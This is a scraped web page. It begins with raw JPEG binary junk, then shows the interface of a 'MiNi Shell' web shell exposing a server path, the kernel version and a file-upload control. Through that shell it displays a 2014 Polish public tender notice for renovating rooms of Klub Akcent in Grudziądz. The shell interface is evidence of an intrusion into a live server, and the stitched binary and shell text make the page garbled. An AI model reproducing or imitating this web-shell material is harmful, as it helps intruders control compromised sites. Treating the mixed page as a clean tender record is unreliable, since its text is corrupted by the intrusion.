JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140226/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140226/39261-N-2014.html

<p class="kh_header"><b>Grudziądz: REMONT POMIESZCZEŃ W KLUBIE AKCENT W GRUDZIĄDZU, UL. WYBICKIEGO 38/40 Remont holu głównego, dwóch toalet i galerii</b><br>
<b>Numer ogłoszenia: 39261 - 2014; data zamieszczenia: 26.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Kultury Teatr , ul. Focha 19, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4624223, faks 056 4623477.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.teatr.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT POMIESZCZEŃ W KLUBIE AKCENT W GRUDZIĄDZU, UL. WYBICKIEGO 38/40 Remont holu głównego, dwóch toalet i galerii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje wykonanie następujących prac : W zakresie holu wejściowego i holu zaplecza szatniowego:
Naprawa schodów zewnętrznych wejścia głównego, Naprawa pochylni dla osób niepełnosprawnych, Rozbiórka istniejących ściennych boazerii drewnianych, Rozbiórka istniejących lad szatniowych i boksu kasowego, Demontaż stolarki drzwiowej wewnętrznej, Demontaż istniejącego sufitu podwieszonego, Demontaż balustrad schodowych schodów wewnętrznych, Skucie istniejących tynków wewnętrznych, Wykonanie nowych tynków wewnętrznych gipsowych, Likwidacja naświetli łukowych nad drzwiami w pomieszczeniu zaplecza szatniowego poprzez wykonanie zabudowy systemowej z płyt GK, Wykonanie 2x szpachlowanie sufitu w pomieszczeniu zaplecza, Wykonanie 2x szpachlowanie ścian, Wykonanie okładziny ściennej z płyt plastikowych gr 0,8 mm i 2 mm, Wykonanie tynków ściennych mozaikowych o drobnym uziarnieniu, Wykonanie sufitów podwieszonych z płyt GK w holu głównym, Szpachlowanie sufitów z płyt GK, Malowanie farbą lateksową sufitu w holu wejściowym w kolorze ciemnego brązu, Wykonanie sufitu napinanego z folii w kolorze złocistym, Malowanie sufitu w pom. zaplecza szatniowego farbą lateksową matową w kolorze białym, Malowanie ścian farbą lateksową, Przebudowa dolnych stopni schodów wewnętrznych, Ułożenie nowej posadzki z gresu podłogowego zachowując jako podkład istniejące posadzki, Wykonanie okładzin schodów z płyt gresowych ryflowanych na istniejącym podkładzie z lastryka, Montaż balustrad ze szkła samonośnego z płyt szklanych klejonych i montaż poręczy z drewna lakierowanego ciśnieniowo  i klejonych do płyt szklanych balustradowych, Montaż nowej stolarki drzwiowej wewnętrznej, Wykonanie lady szatniowej w systemie płyt GK na ruszcie stalowym z obłożeniem blatu lady płytami okładziny plastikowej o gr 2 mm oraz z tynkiem mozaikowym na powierzchni od strony holu (pod blatem), Wykonanie boksu kasowego, Wykonanie elementów wystroju usytuowanych nad ladą i boksem kasowym w postaci obudów z płyt GK oraz dodatkowo obudowy dolnej płytą plastikową, Wykonanie wieszaków szatni, Montaż mebli ruchomych, siedzisk, Montaż oświetlenia-wg opracowania branży elektrycznej, Montaż grzejników co
W zakresie dwóch toalet strefy wejścia głównego: rozbiórka sufitu podwieszonego, 	demontaż istniejącego wyposażenia sanitarnego, skucie okładzin ściennych z glazury oraz tynków, skucie posadzki z terakoty, wymiana podejść instalacji wodnej i sanitarnej, wykonanie nowej instalacji elektrycznej - wg opracowania branży elektrycznej, wykonanie nowych tynków gipsowych, wykonanie nowych okładzin z glazury, 	wykonanie nowych posadzek z płyt gresowych, montaż nowego sufitu podwieszonego, montaż nowego wyposażenia sanitarnego, wykonanie robót malarskich, wymiana instalacji elektrycznej oświetleniowej podstawowej-wg opracowania branży elektrycznej,
wymiana instalacji gniazd wtykowych jednofazowych-wg opracowania branży elektrycznej; wymiana instalacji centralnego ogrzewania - wymiana grzejnika z żeberkowego na płytowy.
W zakresie galerii wystawienniczej, holu wejściowego, toalet-branża elektryczna
Demontaż istniejącego oświetlenia.Projektuje się wymianę oświetlenia lampami. Wbudowanie lamp i instalacji przewodami podtynkowymi, miedzianymi, zgodnie z załączonym do SIWZ projektem. Zasilanie projektowanego oświetlenia odbywać się będzie z istniejącej tablicy rozdzielczej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 45.33.00.00-9, 45.41.00.00-4, 45.44.21.00-8, 45.11.13.00-1, 45.42.11.52-4, 45.42.11.46-9, 45.43.11.00-8, 45.43.12.00-9, 45.45.12.00-5, 45.42.10.00-4, 45.42.11.60-3, 45.26.23.50-9, 45.45.00.00-6, 45.33.20.00-3, 45.33.11.00-7, 45.31.10.00-0, 45.31.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium. Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości: 3.000 zł (słownie: trzy tysiące). Forma wadium
Wadium musi obejmować cały okres związania ofertą i może być wniesione w jednej lub kilku następujących formach: a)w pieniądzu, b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, c)gwarancjach bankowych, d)gwarancjach ubezpieczeniowych, e)poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz,U.2007 Nr 42, poz. 275, z późn. zm.) Dokument potwierdzający wniesienie wadium w formie niepieniężnej powinien być dostarczony Zamawiającemu w oryginale.
Elementy składowe gwarancji lub poręczenia. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja musi być sporządzona zgodnie z obowiązującym prawem i powinna zawierać następujące elementy:
a)nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib, b)określenie wierzytelności, która ma być zabezpieczona gwarancją, c)kwotę gwarancji, d)termin ważności gwarancji,
e)zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze  pisemne żądanie Zamawiającego zawierające oświadczenia, iż Wykonawca, którego ofertę wybrano: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub nie wniósł zabezpieczenia należytego wykonania umowy, lub zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, f)zobowiązanie gwaranta:do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, i nie udowodnił, iż wynika to z przyczyn nie leżących po jego stronie, g)gwarancja winna być nieodwołalna i bezwarunkowa, h)wszelkie spory dotyczące gwarancji podlegają rozstrzygnięciu zgodnie z prawem Rzeczypospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby Zamawiającego, i)jednocześnie Zamawiający wymaga, aby okres ważności wniesionego wadium nie był krótszy niż związanie ofertą. Postanowienia składane powyżej stosuje się odpowiednio do poręczeń. Miejsce i sposób wniesienia wadium. W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek bankowy Zamawiającego nr : 89 1240 1949 1111 0000 1355 7360. Wadium wnoszone w innych dopuszczalnych przez Zamawiającego formach, należy w oryginale dołączyć do oferty, w przypadku konsorcjum wadium może być wniesione przez jednego z wykonawców, pełnomocnika Wykonawców. Termin wniesienia wadium. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu, Zamawiający będzie uważał za skuteczne w chwili uznania rachunku Zamawiającego. Wadium musi być wniesione na cały okres związania ofertą wymagany treścią SIWZ lub wezwaniem. Wniesienie wadium w formie innej niż pieniądz, poprzez dołączenie go do oferty, jest równoznaczne z wniesieniem go przed upływem terminu składania ofert, pod warunkiem złożenia oferty przed terminem składania ofert. Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta do upływu terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości i formie.  Zwrot wadium. Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Pzp. Zamawiający będzie żądać ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana, jako najkorzystniejsza. W takim przypadku Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. Zatrzymanie wadium
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, iż wynika to z przyczyn nieleżących po jego stronie. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, c)zawarcie umowy w sprawie  zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie w zakresie art. 22 ust.1 ustawy Pzp. ocena metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, wykonał: dwa zadania,  z których każde, swoim zakresem obejmowało roboty remontowe polegające na przebudowie pomieszczeń w zakresie robót wykończeniowych o wartości nie mniejszej niż wartość złożonej oferty. ocena metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie w zakresie art. 22 ust.1 . ocena metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże,  że dysponuje osobą, osobami, które będą posiadały wymagane uprawnienia budowlane:
kierownik budowy-1 osoba posiadająca uprawnienia do kierowania             robotami budowlanymi o specjalności konstrukcyjno-budowlanej, kierownika robót-1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności sanitarnej, kierownik robót-1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w zakresie instalacji elektrycznych. ocena metodą spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca, wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia, w wysokości min. 100.000 złotych. ocena metodą spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykaz wykonanych robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie: dwa zadania,  z których każde, swoim zakresem obejmowało roboty remontowe polegające na przebudowie pomieszczeń w zakresie robót wykończeniowych o wartości nie mniejszej niż wartość złożonej oferty oraz załączyć dowody lub dokumenty potwierdzające, że roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 2.Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienie: oryginał lub notarialnie poświadczona kopia.
Zamawiający podpisze umowę z Wykonawcą, którego oferta zostanie uznana za najkorzystniejszą z punktu widzenia kryterium przyjętym w niniejszej specyfikacji. Wykonawca dostarczy najpóźniej w dniu podpisania umowy, ale przed jej podpisaniem:1.Dokument potwierdzający wniesienie zabezpieczenia, w wysokości i formie określonej w punkcie XVIII niniejszej specyfikacji.    
2.Dokument lub dokumenty potwierdzające prawo osoby składającej podpis pod umową do występowania w imieniu Wykonawcy i możliwości zawarcia umowy z Zamawiającym. 3.Kopię uprawnień budowlanych oraz kopię zaświadczenia o aktualnej przynależności do Okręgowej Izby Inżynierów Budownictwa, osób, które będą kierowały robotami budowlanymi, w wymaganych w SIWZ branżach i zakresach, obejmujących w pełni zakres robót przewidzianych w umowie. 4.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub korzystający z usług podwykonawcy, zobowiązani są przedłożyć umowę regulującą ich współpracę. 5.Opłaconą polisę, potwierdzającą, że Wykonawca zawarł na własny koszt umowę ubezpieczenia odpowiedzialności cywilnej kontraktowej i deliktowej z tytułu prowadzenia działalności, uwzględniające w swym zakresie rodzaj i charakter robót wynikających z umowy zawartej z Zamawiającym. Ubezpieczenie powinno opiewać: na sumę nie niższą niż 200.000 zł. Dodatkowo zakres ubezpieczenia odpowiedzialności cywilnej powinien obejmować:a)Odpowiedzialność Cywilną za szkody powstałe po wykonaniu pracy lub usługi wynikłe z nienależytego wykonania zobowiązania ( wadliwego wykonania prac)-do pełnej kwoty limitu odpowiedzialności na jedno i wszystkie zdarzenia w okresie ubezpieczenia
b)Odpowiedzialność Cywilną podwykonawcy-do pełnej kwoty limitu odpowiedzialności na jedno i wszystkie zdarzenia w okresie ubezpieczenia ( w przypadku gdy Wykonawca będzie korzystał  z podwykonawców).
Dodatkowo franszyza redukcyjna nie może być wyższa niż 1.000 PLN
Ubezpieczenie to będzie utrzymane przez cały okres realizacji niniejszej     Umowy. 6.Kosztorys ofertowy na kwotę zgodną ze złożoną ofertą, który będzie służył jedynie do określenia zaawansowania robót, w trakcie realizacji zadania.
7.Harmonogram rzeczowo-terminowo-finansowy robót, który wcześniej należy uzgodnić z Zamawiającym. Wykonawca jest zobowiązany uwzględnić wymagania Zamawiającego, co do kolejności remontowanych pomieszczeń.
8.Opracowany plan BIOZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień umowy wymagają formy pisemnej pod rygorem nieważności i mogą nastąpić z uwzględnieniem art. 144 ustawy Prawo zamówień publicznych, w szczególności w następujących przypadkach:
1.Zmiany terminu wykonania robót w przypadku: a)wstrzymania robót przez właściwy organ, z przyczyn niezawinionych przez Wykonawcę, np. dokonanie odkryć archeologicznych, odkrycia niewybuchu, itp.; b)wystąpienie niekorzystnych warunków pogodowych, uniemożliwiających dochowanie wymogów technicznych i technologicznych; c)wystąpienie sił wyższych; d)konieczności przeprowadzenia nieprzewidzianych uzgodnień prawnych lub technicznych; e) kiedy Zamawiający zwróci się o ustalenie przerwy w prowadzonych przez Wykonawcę robotach na czas trwania imprez w CKT. O ilość dni przerwy dopuszcza się przedłużenie terminu wykonania roboty.
